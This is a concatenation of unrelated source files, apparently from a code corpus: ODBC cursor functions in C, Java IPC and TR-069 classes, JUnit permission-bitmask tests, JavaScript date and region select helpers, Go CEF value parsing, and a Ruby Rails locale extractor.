 * was fetched by SQLExtendedFetch.  Useful (so far) only for a subsequent
 * SQLGetData.  Only SQL_POSITION and SQL_REFRESH are supported.
 */
RETCODE SQL_API SQLSetPos(
        HSTMT hstmt,
        SQLSETPOSIROW irow,
        UWORD fOption,
        UWORD fLock)
{
    static char* const func = "SQLSetPos";
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *res;
    int num_cols, i;
    BindInfoClass *bindings;

    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    /* BUGFIX: read the bindings only after the handle has been validated;
     * the original initialized this at declaration, dereferencing stmt
     * before the NULL-handle check above. */
    bindings = stmt->bindings;

    if (fOption != SQL_POSITION && fOption != SQL_REFRESH) {
        SC_set_error(stmt, STMT_NOT_IMPLEMENTED_ERROR, "Only SQL_POSITION/REFRESH is supported for SQLSetPos");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    if ( ! (res = stmt->result)) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLSetPos.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    num_cols = QR_NumResultCols(res);

    /* irow == 0 would mean "apply to every row" (a bulk operation). */
    if (irow == 0) {
        SC_set_error(stmt, STMT_ROW_OUT_OF_RANGE, "Driver does not support Bulk operations.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    if (irow > stmt->last_fetch_count) {
        SC_set_error(stmt, STMT_ROW_OUT_OF_RANGE, "Row value out of range");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    irow--; /* convert to a zero-based offset within the rowset */

    /* Reset for SQLGetData: forget any partial-read state per column. */
    for (i = 0; i < num_cols; i++)
        bindings[i].data_left = -1;

    QR_set_position(res, irow);

    stmt->currTuple = stmt->rowset_start + irow;

    return SQL_SUCCESS;
}
/* Sets options that control the behavior of cursors. */
/* Deprecated ODBC 1.0 entry point; not implemented - callers should use
   the statement-option API instead (see the comment below). */
SQLRETURN SQLSetScrollOptions(  /* Use SQLSetStmtOptions */
        SQLHSTMT hstmt,
        SQLUSMALLINT fConcurrency,
        SQLLEN crowKeyset,
        SQLUSMALLINT crowRowset)
{
    static char* const func = "SQLSetScrollOptions";

    SC_log_error(func, "Function not implemented", (StatementClass *) hstmt);
    return SQL_ERROR;
}
/* Set the cursor name on a statement handle */
/* The name is copied into the fixed-size stmt->cursor_name buffer; names
   that are empty or too long for the buffer are rejected. */
RETCODE SQL_API SQLSetCursorName(
        HSTMT hstmt,
        UCHAR FAR *szCursor,
        SWORD cbCursor)
{
    static char* const func="SQLSetCursorName";
    StatementClass *stmt = (StatementClass *) hstmt;
    int len;

    mylog("SQLSetCursorName: hstmt=%u, szCursor=%u, cbCursorMax=%d\n", hstmt, szCursor, cbCursor);

    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }

    /* NOTE(review): a NULL szCursor with cbCursor == SQL_NTS would reach
       strlen(NULL); presumably the driver manager guarantees a non-NULL
       name here - confirm. */
    len = (cbCursor == SQL_NTS) ? strlen((char*)szCursor) : cbCursor;

    if (len <= 0 || len > sizeof(stmt->cursor_name) - 1) {
        SC_set_error(stmt, STMT_INVALID_CURSOR_NAME, "Invalid Cursor Name");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    strncpy_null((char*)stmt->cursor_name, (char*)szCursor, len+1);
    return SQL_SUCCESS;
}
/* Return the cursor name for a statement handle */
/* Copies the stored cursor name into the caller's buffer, reporting
   truncation via SQL_SUCCESS_WITH_INFO; errors if no name has been set. */
RETCODE SQL_API SQLGetCursorName(
        HSTMT hstmt,
        UCHAR FAR *szCursor,
        SWORD cbCursorMax,
        SWORD FAR *pcbCursor)
{
    static char* const func="SQLGetCursorName";
    StatementClass *stmt = (StatementClass *) hstmt;
    int len = 0;
    RETCODE result;

    mylog("SQLGetCursorName: hstmt=%u, szCursor=%u, cbCursorMax=%d, pcbCursor=%u\n", hstmt, szCursor, cbCursorMax, pcbCursor);

    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }

    if ( stmt->cursor_name[0] == '\0') {
        SC_set_error(stmt, STMT_NO_CURSOR_NAME, "No Cursor name available");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    result = SQL_SUCCESS;
    len = strlen(stmt->cursor_name);

    if (szCursor) {
        strncpy_null((char*)szCursor, (char*)stmt->cursor_name, cbCursorMax);
        /* Name did not fit: per ODBC, still succeed but flag truncation. */
        if (len >= cbCursorMax) {
            result = SQL_SUCCESS_WITH_INFO;
            SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
        }
    }

    if (pcbCursor)
        *pcbCursor = len;

    return result;
}
|
BantorSchwanzVor/plotscanner-leak
|
org/newdawn/slick/svg/Loader.java
|
<gh_stars>0
package org.newdawn.slick.svg;
import org.newdawn.slick.geom.Transform;
import org.w3c.dom.Element;
/**
 * Callback used while walking an SVG document tree.
 */
public interface Loader {
    /**
     * Loads the children of the given DOM element, applying the supplied
     * transform to the produced geometry.
     *
     * @param paramElement   the DOM element whose children should be loaded
     * @param paramTransform the transform to apply while loading
     * @throws ParsingException if the element's content cannot be parsed
     */
    void loadChildren(Element paramElement, Transform paramTransform) throws ParsingException;
}
/* Location: C:\Users\BSV\AppData\Local\Temp\Rar$DRa6216.20396\Preview\Preview.jar!\org\newdawn\slick\svg\Loader.class
* Java compiler version: 8 (52.0)
* JD-Core Version: 1.1.3
*/
|
jc-lab/sipc
|
java/src/main/java/kr/jclab/javautils/sipc/ProcessSipcHost.java
|
<filename>java/src/main/java/kr/jclab/javautils/sipc/ProcessSipcHost.java
package kr.jclab.javautils.sipc;
import kr.jclab.javautils.sipc.channel.ChannelHost;
import kr.jclab.javautils.sipc.crypto.CryptoException;
import kr.jclab.javautils.sipc.crypto.DefaultEphemeralKeyAlgorithmsFactory;
import kr.jclab.javautils.sipc.crypto.EphemeralKeyAlgorithmFactory;
import java.io.IOException;
import java.io.InputStream;
import java.util.concurrent.Executor;
public class ProcessSipcHost extends SipcHost {
protected Process process = null;
protected ProcessSipcHost(
ChannelHost channelHost,
EphemeralKeyAlgorithmFactory keyPairGenerator,
Executor executor
) throws CryptoException {
super(channelHost, keyPairGenerator, executor);
}
public void attachProcess(Process process) {
this.process = process;
this.ioThread.start();
}
private final Thread ioThread = new Thread(() -> {
try {
while (this.process.isAlive()) {
Thread.sleep(1000);
}
this.feedDone();
} catch (InterruptedException e) {
this.feedError(e);
}
});
public static Builder builder(ChannelHost channelHost) {
return new Builder(channelHost);
}
public static class Builder {
private final ChannelHost channelHost;
private EphemeralKeyAlgorithmFactory keyPairGenerator = null;
private Executor executor = null;
public Builder(ChannelHost channelHost) {
this.channelHost = channelHost;
}
public Builder keyPairGenerator(EphemeralKeyAlgorithmFactory keyPairGenerator) {
this.keyPairGenerator = keyPairGenerator;
return this;
}
public Builder executor(Executor executor) {
this.executor = executor;
return this;
}
public ProcessSipcHost build() throws CryptoException {
if (this.keyPairGenerator == null) {
this.keyPairGenerator = DefaultEphemeralKeyAlgorithmsFactory.getInstance();
}
return new ProcessSipcHost(
this.channelHost,
this.keyPairGenerator,
this.executor
);
}
}
}
|
manoj-gk/tr069simulator
|
src/main/java/org/dslforum/cwmp_1_0/SetVouchers.java
|
package org.dslforum.cwmp_1_0;
/**
 * SetVouchers message - Annex A.4.1.3
 *
 * <p>CWMP (TR-069) RPC that an ACS sends to a CPE to deliver a list of
 * vouchers.  This class is a JiBX binding for the schema fragment below.
 *
 * Schema fragment(s) for this class:
 * <pre>
 * &lt;xs:element xmlns:ns="urn:dslforum-org:cwmp-1-0" xmlns:xs="http://www.w3.org/2001/XMLSchema" name="SetVouchers"&gt;
 *   &lt;xs:complexType&gt;
 *     &lt;xs:sequence&gt;
 *       &lt;xs:element type="ns:VoucherList" name="VoucherList"/&gt;
 *     &lt;/xs:sequence&gt;
 *   &lt;/xs:complexType&gt;
 * &lt;/xs:element&gt;
 * </pre>
 */
public class SetVouchers
{
    private VoucherList voucherList;

    /**
     * Get the 'VoucherList' element value.
     *
     * @return value
     */
    public VoucherList getVoucherList() {
        return voucherList;
    }

    /**
     * Set the 'VoucherList' element value.
     *
     * @param voucherList the voucher list to carry in this message
     */
    public void setVoucherList(VoucherList voucherList) {
        this.voucherList = voucherList;
    }
}
|
skiyooka/blackduck-alert
|
alert-common/src/test/java/com/synopsys/integration/alert/common/enumeration/AccessOperationTest.java
|
package com.synopsys.integration.alert.common.enumeration;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import org.junit.jupiter.api.Test;
import com.synopsys.integration.alert.common.util.BitwiseUtil;
/**
 * Tests for the {@code AccessOperation} permission bitmask: each operation
 * maps to a distinct power-of-two bit and {@code isPermitted(mask)} checks
 * whether that bit is set in a combined permission mask.
 */
public class AccessOperationTest {
@Test
public void validPermissionCheckTest() {
// Masks built by hand: CREATE = bit 1, DELETE = bit 2, both = 3.
int create = 1;
int delete = 2;
int deleteAndCreate = 3;
assertTrue(AccessOperation.CREATE.isPermitted(create));
assertTrue(AccessOperation.DELETE.isPermitted(delete));
assertTrue(AccessOperation.CREATE.isPermitted(deleteAndCreate) && AccessOperation.DELETE.isPermitted(deleteAndCreate));
// An operation must not be permitted by a mask missing its bit.
assertFalse(AccessOperation.CREATE.isPermitted(delete));
assertFalse(AccessOperation.EXECUTE.isPermitted(create));
}
@Test
public void verifyBitsTest() {
// Pins the bit assignment of every operation; changing these values
// would silently change stored permission masks.
assertEquals(1, AccessOperation.CREATE.getBit());
assertEquals(2, AccessOperation.DELETE.getBit());
assertEquals(4, AccessOperation.READ.getBit());
assertEquals(8, AccessOperation.WRITE.getBit());
assertEquals(16, AccessOperation.EXECUTE.getBit());
assertEquals(32, AccessOperation.UPLOAD_FILE_READ.getBit());
assertEquals(64, AccessOperation.UPLOAD_FILE_WRITE.getBit());
assertEquals(128, AccessOperation.UPLOAD_FILE_DELETE.getBit());
assertNotEquals(2, AccessOperation.CREATE.getBit());
}
@Test
public void verifyAddingOperationsTest() {
// Starting from an empty mask, OR-ing in bits grants exactly those operations.
int noPermissions = 0;
for (AccessOperation accessOperation : AccessOperation.values()) {
assertFalse(accessOperation.isPermitted(noPermissions));
}
int newPermissions = noPermissions;
newPermissions = BitwiseUtil.combineBits(newPermissions, AccessOperation.CREATE.getBit());
newPermissions = BitwiseUtil.combineBits(newPermissions, AccessOperation.EXECUTE.getBit());
assertTrue(AccessOperation.CREATE.isPermitted(newPermissions));
assertTrue(AccessOperation.EXECUTE.isPermitted(newPermissions));
assertFalse(AccessOperation.DELETE.isPermitted(newPermissions));
}
@Test
public void verifyRemovingOperationsTest() {
// 255 = all eight bits set; clearing bits revokes exactly those operations.
int allPermissions = 255;
for (AccessOperation accessOperation : AccessOperation.values()) {
assertTrue(accessOperation.isPermitted(allPermissions));
}
int newPermissions = allPermissions;
newPermissions = BitwiseUtil.removeBits(newPermissions, AccessOperation.CREATE.getBit());
newPermissions = BitwiseUtil.removeBits(newPermissions, AccessOperation.DELETE.getBit());
assertFalse(AccessOperation.CREATE.isPermitted(newPermissions));
assertFalse(AccessOperation.DELETE.isPermitted(newPermissions));
assertTrue(AccessOperation.EXECUTE.isPermitted(newPermissions));
}
}
|
shenzeyu/recommend
|
src/main/webapp/scripts/front/clients_js/information1.js
|
<gh_stars>0
// Initializes the year/month/day <select> controls on page load: fills the
// year list (current year +/- 30), months 1-12 and the days of the current
// month (leap-year aware), then preselects today's date.
function onloading(){
    // Save the original <select> markup; these globals are reused by the
    // other change handlers (YearMonth/MonthDay/writeDay).
    strYear = document.formID.year.outerHTML;
    strMonth = document.formID.month.outerHTML;
    strDay = document.formID.day.outerHTML;
    // Days per month for a non-leap year.
    MonHead = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31];
    // Populate the year dropdown: 30 years before and after the current year.
    var year = new Date().getFullYear();
    var str = strYear.substring(0, strYear.length - 9);
    for (var i = (year-30); i < (year+30); i++)
    {
        str += "<option value='" + i + "'> " + i + " 年" + "</option>\r\n";
    }
    document.formID.year.outerHTML = str+"</select>";
    // Populate the month dropdown (1-12).
    var str = strMonth.substring(0, strMonth.length - 9);
    for (var i = 1; i < 13; i++)
    {
        str += "<option value='" + i + "'> " + i + " 月" + "</option>\r\n";
    }
    document.formID.month.outerHTML = str+"</select>";
    document.formID.year.value = year;
    document.formID.month.value = new Date().getMonth() + 1;
    var n = MonHead[new Date().getMonth()];
    // BUGFIX: was IsPinYear(Yearvalue) — `Yearvalue` is undefined in this
    // scope and threw a ReferenceError every February; use the current year.
    if (new Date().getMonth() == 1 && IsPinYear(year)) n++;
    writeDay(n); // populate the day dropdown
    document.formID.day.value = new Date().getDate();
}
// Change handler for the year <select>: recomputes the day list, adjusting
// February for leap years. `str` is the newly selected year.
// NOTE(review): this reads document.month and writes the bare global `day`,
// while onloading goes through document.formID.* — confirm both paths
// resolve to the same elements in the target browsers.
function YearMonth(str){
// When no month is selected yet, restore the original (empty) day list.
var Monthvalue = document.month.options[document.month.selectedIndex].value;
if(Monthvalue == ""){
day.outerHTML = strDay;
return;
}
var n = MonHead[Monthvalue - 1];
// February of a leap year gets one extra day.
if (Monthvalue == 2 && IsPinYear(str)) n++;
writeDay(n);
}
// Change handler for the month <select>: rebuilds the day list for the
// selected month `str`, adjusting February for leap years.
// NOTE(review): reads document.year and the bare global `day`, unlike
// onloading which uses document.formID.* — confirm they match.
function MonthDay(str){
var Yearvalue = document.year.options[document.year.selectedIndex].value;
// When no month is selected, restore the original (empty) day list.
if (str == ""){
day.outerHTML = strDay;
return;
}
var n = MonHead[str - 1];
// February of a leap year gets one extra day.
if (str ==2 && IsPinYear(Yearvalue)) n++;
writeDay(n);
}
// Rebuilds the day <select> with options 1..n, using the original markup
// saved in the global `strDay` by onloading().
function writeDay(n){
var s = strDay.substring(0, strDay.length - 9);
for (var i=1; i<(n+1); i++)
s += "<option value='" + i + "'> " + i + " 日" + "</option>\r\n";
document.formID.day.outerHTML = s +"</select>";
}
// Returns true when `year` is a Gregorian leap year: divisible by 4,
// except century years that are not divisible by 400.
// BUGFIX: removed a leftover debug alert("11111111") that popped up on
// every leap-year check.
function IsPinYear(year){
    return (0 == year%4 && (year%100 !=0 || year%400 == 0));
}
// Static province -> city-list table backing the cascading region selects
// below (SetCity). Keys and values are zh-CN display strings that double as
// option values at runtime — do not translate or reformat them.
var Cities = {
'北京市':['市辖区','所属县'],
'天津市':['市辖区','所属县'],
'河北省':['石家庄市','唐山市','秦皇岛市','邯郸市','邢台市','保定市','张家口市','承德市','沧州市','廊坊市','衡水市'],
'福建省':['福州市','厦门市','莆田市','三明市','泉州市','漳州市','南平市','龙岩市','宁德地区'],
'上海市':['市辖区','所属县'],
'江苏省':['南京市','无锡市','徐州市','常州市','苏州市','南通市','连云港市','淮阴市','盐城市','扬州市','镇江市','泰州市','宿迁市'],
'内蒙古自治区':['呼和浩特市','包头市','乌海市','赤峰市','呼伦贝尔盟','兴安盟','哲里木盟','锡林郭勒盟','乌兰察布盟','伊克昭盟','巴彦淖尔盟','阿拉善盟'],
'浙江省':['杭州市','宁波市','温州市','嘉兴市','湖州市','绍兴市','金华市','衢州市','舟山市','台州市','丽水地区'],
'山西省':['太原市','大同市','阳泉市','长治市','晋城市','朔州市','忻州地区','吕梁地区','晋中地区','临汾地区','运城地区'],
'辽宁省':['沈阳市','大连市','鞍山市','抚顺市','本溪市','丹东市','锦州市','营口市','阜新市','辽阳市','盘锦市','铁岭市','朝阳市','葫芦岛市'],
'吉林省':['长春市','吉林市','四平市','辽源市','通化市','白山市','松原市','白城市','延边朝鲜族自治州'],
'黑龙江省':['哈尔滨市','齐齐哈尔市','鸡西市','鹤岗市','双鸭山市','大庆市','伊春市','佳木斯市','七台河市','牡丹江市','黑河市','绥化地区','大兴安岭地区'],
'安徽省':['合肥市','芜湖市','蚌埠市','淮南市','马鞍山市','淮北市','铜陵市','安庆市','黄山市','滁州市','阜阳市','宿州市','六安地区','宣城地区','巢湖地区','池州地区'],
'广西壮族自治区':['南宁市','柳州市','桂林市','梧州市','北海市','防城港市','钦州市','贵港市','玉林市','南宁地区','柳州地区','贺州地区','百色地区','河池地区'],
'河南省':['郑州市','开封市','洛阳市','平顶山市','安阳市','鹤壁市','新乡市','焦作市','濮阳市','许昌市','漯河市','三门峡市','南阳市','商丘市','信阳市','周口地区','驻马店地区'],
'湖北省':['武汉市','黄石市','十堰市','宜昌市','襄樊市','鄂州市','荆门市','孝感市','荆州市','黄冈市','咸宁市','恩施土家族苗族自治州','省直辖县级行政单位'],
'湖南省':['长沙市','株洲市','湘潭市','衡阳市','邵阳市','岳阳市','常德市','张家界市','益阳市','郴州市','永州市','怀化市','娄底地区','湘西土家族苗族自治州'],
'江西省':['南昌市','景德镇市','萍乡市','九江市','新余市','鹰潭市','赣州市','瑞金市','兴国县','于都县','宁都县','宜春地区','上饶地区','吉安地区','抚州地区'],
'山东省':['济南市','青岛市','淄博市','枣庄市','东营市','烟台市','潍坊市','济宁市','泰安市','威海市','日照市','莱芜市','临沂市','德州市','聊城市','滨州地区','菏泽地区'],
'广东省':['广州市','韶关市','深圳市','珠海市','汕头市','佛山市','江门市','湛江市','茂名市','肇庆市','惠州市','梅州市','汕尾市','河源市','阳江市','清远市','东莞市','中山市','潮州市','揭阳市','云浮市'],
'陕西省':['西安市','铜川市','宝鸡市','咸阳市','渭南市','延安市','汉中市','安康地区','商洛地区','榆林地区'],
'甘肃省':['兰州市','嘉峪关市','金昌市','白银市','天水市','酒泉地区','张掖地区','武威地区','定西地区','陇南地区','平凉地区','庆阳地区','临夏回族自治州','甘南藏族自治州'],
'贵州省':['贵阳市','六盘水市','遵义市','铜仁地区','南布依族苗族自治州','毕节地区','安顺地区','黔东南苗族侗族自治州','黔南布依族苗族自治州'],
'青海省':['西宁市','海东地区','海北藏族自治州','黄南藏族自治州','海南藏族自治州','果洛藏族自治州','玉树藏族自治州','海西蒙古族藏族自治州'],
'海南省':['省所属市、县、岛','海口市','三亚市'],
'重庆市':['市辖区','所属县'],
'四川省':['成都市','自贡市','攀枝花市','泸州市','德阳市','绵阳市','广元市','遂宁市','内江市','乐山市','南充市','宜宾市','广安市','达川地区','雅安地区','阿坝藏族羌族自治州','甘孜藏族自治州','凉山彝族自治州','巴中地区','眉山地区','资阳地区'],
'云南省':['昆明市','曲靖市','玉溪市','昭通地区','楚雄彝族自治州','红河哈尼族彝族自治州','文山壮族苗族自治州','思茅地区','西双版纳傣族自治州','大理白族自治州','保山地区','德宏傣族景颇族自治州','丽江地区','怒江傈僳族自治州','迪庆藏族自治州','临沧地区'],
'西藏自治区':['拉萨市','昌都地区','山南地区','日喀则地区','那曲地区','阿里地区','林芝地区'],
'宁夏回族自治区':['银川市','石嘴山市','吴忠市','固原地区'],
'新疆维吾尔自治区':['乌鲁木齐市','克拉玛依市','吐鲁番地区','哈密地区','昌吉回族自治州','博尔塔拉蒙古自治州','巴音郭楞蒙古自治州','阿克苏地区','克孜勒苏柯尔克孜自治州','喀什地区','和田地区','伊犁哈萨克自治州','伊犁地区','塔城地区','阿勒泰地区','自治区直辖县级行政单位'],
'台湾省':[''],
'香港特别行政区':[''],
'澳门特别行政区':['']
};
// Fills the province <select> (looked up by element id) with one option per
// entry of the global `citydata` array, using each entry's "V" field as both
// label and value.
// NOTE(review): `citydata` is not defined in this file — presumably loaded
// by another script; confirm it is available before this runs.
function SetProvince(SelectId){
var Select_Province = document.getElementById(SelectId);
if(Select_Province){
with(Select_Province){
if(citydata != null){
var leng = citydata.length;
for(var i=0;i<leng;i++){
if(citydata[i]["V"] != null){
options.add(new Option(citydata[i]["V"],citydata[i]["V"]));
}
}
}
}
}
}
// Rebuilds the city <select> for the chosen province using the static
// `Cities` table above; existing options are cleared first.
function SetCity(SelectId, Province){
var Select_City = document.getElementById(SelectId);
if(Select_City){
with(Select_City){
var slen = options.length;
// Assigning null to options[0] removes the first entry each pass,
// so after slen iterations the list is empty.
for(var i=0;i<slen;i++){
options[0] = null;
}
// Unknown province: leave the list empty.
if(Cities[Province] == null)
return;
var len = Cities[Province].length;
for(var i=0;i<len;i++){
options[i] = new Option(Cities[Province][i],Cities[Province][i]);
}
}
}
}
// Fills the district/section <select> for the chosen city from the global
// `citydata` tree (each node: "V" = name, "C" = children). The four
// municipalities (北京/天津/上海/重庆) are special-cased: their districts hang
// directly off the province node instead of a city node.
// NOTE(review): `citydata`, `ClearOptions` and `$(...)` are not defined in
// this file — presumably provided by another script (Prototype-style $);
// confirm they are loaded first.
function SetSection(ParentSelectId, SelectId, City){
var leng = citydata.length;
var Select_obj = document.getElementById(SelectId);
ClearOptions(SelectId, '','');
var province = $(ParentSelectId).value;
for(var i=0;i<leng;i++){
var obj = citydata[i]["C"];
if(province == "北京市" || province == "天津市" || province == "上海市" || province == "重庆市"){
// Municipality: children of the province node are the districts.
if(province == citydata[i]["V"]){
var region = citydata[i]["C"];
var len1 = region.length;
for(var h=0;h<len1;h++){
Select_obj.options.add(new Option(region[h]["V"],region[h]["V"]));
}
}
}else{
// Regular province: find the matching city node and add its children.
var le = obj.length;
for(var j=0;j<le;j++){
if(obj[j]["V"] == City){
if(obj[j]["C"] != null){
var l = obj[j]["C"].length;
var obj2 = obj[j]["C"];
for(var k=0;k<l;k++){
Select_obj.options.add(new Option(obj2[k]["V"],obj2[k]["V"]));
}
}
}
}
}
}
}
|
kemokemo/beats
|
x-pack/filebeat/processors/decode_cef/cef/types.go
|
// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
// or more contributor license agreements. Licensed under the Elastic License;
// you may not use this file except in compliance with the Elastic License.
package cef
import (
"net"
"strconv"
"time"
"github.com/pkg/errors"
"github.com/elastic/beats/v7/libbeat/common"
)
// DataType specifies one of CEF data types.
type DataType uint8
// List of DataTypes. Unset is the zero value, meaning no explicit type was
// assigned; the remaining values mirror the CEF extension data dictionary.
const (
Unset DataType = iota
IntegerType
LongType
FloatType
DoubleType
StringType
BooleanType
IPType
MACAddressType
TimestampType
)
// ToType converts the given string value to the specified data type.
// It returns an error when the value cannot be parsed as typ, or when typ
// is Unset or otherwise unknown.
func ToType(value string, typ DataType) (interface{}, error) {
switch typ {
case StringType:
return value, nil
case LongType:
return toLong(value)
case IntegerType:
return toInteger(value)
case FloatType:
return toFloat(value)
case DoubleType:
return toDouble(value)
case BooleanType:
return toBoolean(value)
case IPType:
return toIP(value)
case MACAddressType:
return toMACAddress(value)
case TimestampType:
return toTimestamp(value)
default:
return nil, errors.Errorf("invalid data type: %v", typ)
}
}
// toLong parses v as a 64-bit integer; base 0 means the base is inferred
// from the prefix (0x hex, 0 octal, otherwise decimal).
func toLong(v string) (int64, error) {
return strconv.ParseInt(v, 0, 64)
}
// toInteger parses v as a 32-bit integer (base inferred from prefix).
func toInteger(v string) (int32, error) {
i, err := strconv.ParseInt(v, 0, 32)
return int32(i), err
}
// toFloat parses v as a 32-bit float.
func toFloat(v string) (float32, error) {
f, err := strconv.ParseFloat(v, 32)
return float32(f), err
}
// toDouble parses v as a 64-bit float.
func toDouble(v string) (float64, error) {
f, err := strconv.ParseFloat(v, 64)
return f, err
}
// toBoolean parses v as a boolean, accepting the forms recognized by
// strconv.ParseBool ("1", "t", "TRUE", "0", "f", "false", ...).
func toBoolean(v string) (bool, error) {
return strconv.ParseBool(v)
}
// toIP validates that v is a well-formed IPv4 or IPv6 address and returns it
// unchanged (no normalization of the textual form).
func toIP(v string) (string, error) {
// This is validating that the value is an IP.
if net.ParseIP(v) != nil {
return v, nil
}
return "", errors.New("value is not a valid IP address")
}
// toMACAddress accepts a MAC addresses as hex characters separated by colon,
// dot, or dash. It returns lowercase hex characters separated by colons
// (the canonical form produced by net.HardwareAddr.String).
func toMACAddress(v string) (string, error) {
// CEF specifies that MAC addresses are colon separated, but this will be a
// little more liberal.
hw, err := net.ParseMAC(v)
if err != nil {
return "", err
}
return hw.String(), nil
}
// timeLayouts are the Go reference layouts tried in order by toTimestamp.
// "_2" accepts a space-padded day of month; layouts without a year yield
// year 0, which toTimestamp replaces with the current year.
var timeLayouts = []string{
// MMM dd HH:mm:ss.SSS zzz
"Jan _2 15:04:05.000 MST",
"Jan _2 15:04:05.000 Z0700",
"Jan _2 15:04:05.000 Z07:00",
"Jan _2 15:04:05.000 GMT-07:00",
// MMM dd HH:mm:ss.SSS
"Jan _2 15:04:05.000",
// MMM dd HH:mm:ss zzz
"Jan _2 15:04:05 MST",
"Jan _2 15:04:05 Z0700",
"Jan _2 15:04:05 Z07:00",
"Jan _2 15:04:05 GMT-07:00",
// MMM dd HH:mm:ss
"Jan _2 15:04:05",
// MMM dd yyyy HH:mm:ss.SSS zzz
"Jan _2 2006 15:04:05.000 MST",
"Jan _2 2006 15:04:05.000 Z0700",
"Jan _2 2006 15:04:05.000 Z07:00",
"Jan _2 2006 15:04:05.000 GMT-07:00",
// MMM dd yyyy HH:mm:ss.SSS
"Jan _2 2006 15:04:05.000",
// MMM dd yyyy HH:mm:ss zzz
"Jan _2 2006 15:04:05 MST",
"Jan _2 2006 15:04:05 Z0700",
"Jan _2 2006 15:04:05 Z07:00",
"Jan _2 2006 15:04:05 GMT-07:00",
// MMM dd yyyy HH:mm:ss
"Jan _2 2006 15:04:05",
}
// toTimestamp parses v either as epoch milliseconds (any integer) or as one
// of the layouts in timeLayouts, interpreted as UTC unless the layout
// carries a zone. Layouts lacking a year parse to year 0, which is shifted
// to the current year.
func toTimestamp(v string) (common.Time, error) {
if unixMs, err := toLong(v); err == nil {
return common.Time(time.Unix(0, unixMs*int64(time.Millisecond))), nil
}
for _, layout := range timeLayouts {
ts, err := time.ParseInLocation(layout, v, time.UTC)
if err == nil {
// Use the current year if the parsed year is zero (layout had no year).
if ts.Year() == 0 {
currentYear := time.Now().In(ts.Location()).Year()
// AddDate(currentYear, 0, 0) shifts year 0 to the current year.
ts = ts.AddDate(currentYear, 0, 0)
}
return common.Time(ts), nil
}
}
return common.Time(time.Time{}), errors.New("value is not a valid timestamp")
}
|
opensrp/opensrp-client-sid
|
opensrp-vaksinator/src/main/java/org/smartregister/vaksinator/sync/UpdateActionsTask.java
|
package org.smartregister.vaksinator.sync;
import android.content.Context;
import android.util.Log;
import org.smartregister.vaksinator.service.SyncService;
import util.ServiceTools;
import static org.smartregister.util.Log.logInfo;
public class UpdateActionsTask {
private static final String TAG = UpdateActionsTask.class.getName();
private Context context;
public UpdateActionsTask(Context context) {
this.context = context;
}
public void updateFromServer() {
if (org.smartregister.Context.getInstance().IsUserLoggedOut()) {
logInfo("Not updating from server as user is not logged in.");
return;
}
try {
ServiceTools.startService(context, SyncService.class);
Log.e(TAG, "sync: started" );
} catch (Exception e) {
Log.e(TAG, "sync: error" );
}
}
}
|
zoodles/vocab
|
lib/vocab/extractor/rails.rb
|
<filename>lib/vocab/extractor/rails.rb
# Rails extractor: extracts Rails-style YAML locale files and diffs the
# current English translations against the last-translated git SHA so only
# changed strings are sent to translators.
module Vocab
module Extractor
class Rails < Base
# Default English output file names for diff and full extracts.
DIFF = 'en.yml'
FULL = 'en.full.yml'
# Per-locale output file name suffixes.
DIFF_SUFFIX = 'diff.yml'
FULL_SUFFIX = 'full.yml'
class << self
# Writes only the changed strings. +plurals+ is accepted for interface
# compatibility but unused (Rails treats plurals as normal strings).
def write_diff( strings, plurals, path, locale = :en )
path ||= "#{Vocab.root}/#{locale}.#{DIFF_SUFFIX}"
write( strings, path )
end
# Writes the complete set of strings for the locale.
def write_full( strings, plurals, path, locale = :en )
path ||= "#{Vocab.root}/#{locale}.#{FULL_SUFFIX}"
write( strings, path )
end
# Serializes the nested translation hash to YAML at +path+ and tells the
# user where the extract went.
def write( translations, path, locale = :en )
data = hasherize( translations, locale ).to_yaml
File.open( path, "w+" ) { |f| f.write( data ) }
Vocab.ui.say( "Extracted to #{path}" )
end
# Reconstructs the en.* locale files as of the last-translated git SHA
# into tmp/last_translation and returns their flattened translations.
def previous_strings( locales_root = nil )
locales_root ||= "config/locales"
tmpdir = "#{Vocab.root}/tmp/last_translation"
`rm -rf #{tmpdir}/*`
sha = Vocab.settings.last_translation
translation_files = `git ls-tree --name-only -r #{sha}:#{locales_root}`.split( "\n" )
translation_files = translation_files.select { |f| f =~ /en.(yml|rb)$/ }
translation_files.each do |path|
tmpdir_path = "#{tmpdir}/#{path}"
FileUtils.mkdir_p( File.dirname( tmpdir_path ) )
File.open( tmpdir_path, "w+" ) do |f|
yml = previous_file( "#{locales_root}/#{path}", sha )
f.write( yml )
end
end
return translations( tmpdir )
end
# Flattened translations as they currently exist on disk.
def current_strings( locales_root = nil )
locales_root ||= "#{Vocab.root}/config/locales"
return translations( locales_root )
end
# Treat this as a no-op because plurals handled like normal strings
def previous_plurals
return {}
end
# Treat this as a no-op because plurals handled like normal strings
def current_plurals
return {}
end
# Writes a <locale>.full.yml into +result_dir+ for every locale found
# under +locales_root+.
def extract_all( locales_root = nil, result_dir = nil )
locales_root ||= "#{Vocab.root}/config/locales"
result_dir ||= Vocab.root
translator = Vocab::Translator::Rails.new
translator.load_dir( locales_root )
translator.available_locales.each do |locale|
strings = translations( locales_root, locale )
path = "#{result_dir}/#{locale}.full.yml"
write( strings, path, locale )
end
end
# Loads all locale files under +dir+ and returns a flat hash of
# locale-prefixed keys (e.g. "en.foo.bar") to values.
def translations( dir, locale = :en )
translator = Vocab::Translator::Rails.new( locale )
translator.load_dir( dir )
return translator.flattened_translations( :prefix => true )
end
